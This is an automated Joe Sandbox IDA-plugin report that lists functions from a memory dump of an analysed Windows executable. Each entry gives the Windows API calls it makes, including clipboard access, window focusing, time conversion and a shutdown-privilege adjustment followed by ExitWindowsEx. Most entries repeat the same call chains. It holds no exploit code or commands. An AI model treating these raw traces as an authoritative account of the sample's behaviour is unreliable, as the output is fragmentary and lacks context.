Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427D78, Relevance: 9.2, APIs: 6, Instructions: 173time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427D1F, Relevance: 9.2, APIs: 6, Instructions: 173time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004263B4, Relevance: 9.2, APIs: 6, Instructions: 172time

APIs

Part of subcall function 00433FF0: GetWindowThreadProcessId.USER32 ref: 0043403D
Part of subcall function 00433FF0: GetGUIThreadInfo.USER32(00000000), ref: 00434044
Part of subcall function 00433FF0: GetClassNameA.USER32(00000030,?,000000FC), ref: 00434067
Part of subcall function 00433FF0: EnumChildWindows.USER32(00000000,00434140,?), ref: 00434089

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004263DA, Relevance: 9.2, APIs: 6, Instructions: 172time

APIs

Part of subcall function 004341C0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043423E
Part of subcall function 004341C0: AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 00434266
Part of subcall function 004341C0: SetFocus.USER32(?), ref: 00434276
Part of subcall function 004341C0: AttachThreadInput.USER32(00000E10,00000000,00000000), ref: 004342BD

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00428318, Relevance: 9.2, APIs: 6, Instructions: 172time

APIs

Part of subcall function 00452610: GetCurrentProcess.KERNEL32(00000028,?), ref: 0045261A
Part of subcall function 00452610: OpenProcessToken.ADVAPI32(00000000), ref: 00452621
Part of subcall function 00452610: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0045263D
Part of subcall function 00452610: AdjustTokenPrivileges.ADVAPI32 ref: 00452665
Part of subcall function 00452610: GetLastError.KERNEL32 ref: 0045266B
Part of subcall function 00452610: ExitWindowsEx.USER32(?,00000000), ref: 0045267B

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427F51, Relevance: 9.2, APIs: 6, Instructions: 172time

APIs

Part of subcall function 0046E4E0: GetFullPathNameA.KERNEL32(004987E9,00000104,?,?), ref: 0046E4F8
Part of subcall function 0046E4E0: WritePrivateProfileStringA.KERNEL32(?,?,00000000,?), ref: 0046E51B
Part of subcall function 0046E4E0: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0046E52A

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426F39, Relevance: 9.2, APIs: 6, Instructions: 172time

APIs

Part of subcall function 0043FF90: GetLastError.KERNEL32 ref: 004401BB
Part of subcall function 0043FF90: GetLastError.KERNEL32(?,?,?,?,004987E9,00426F58,?,004987E9,004987E9,?), ref: 00440222

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004272F3, Relevance: 9.2, APIs: 6, Instructions: 172time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00451810: GetLastError.KERNEL32 ref: 00451850
Part of subcall function 00451810: 74791B72.VERSION(00000000,0049A9C0,?,?), ref: 004518D8
Part of subcall function 00451810: GetLastError.KERNEL32 ref: 0045195D

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426697, Relevance: 9.2, APIs: 6, Instructions: 172time

APIs

Part of subcall function 00436A20: GetWindowRect.USER32(00000000,?), ref: 00436A7F

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042643E, Relevance: 9.2, APIs: 6, Instructions: 171time

APIs

Part of subcall function 00434390: SendMessageTimeoutA.USER32(00000000,0000000E,00000000,00000000,00000002,00001388,?), ref: 004343D2

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

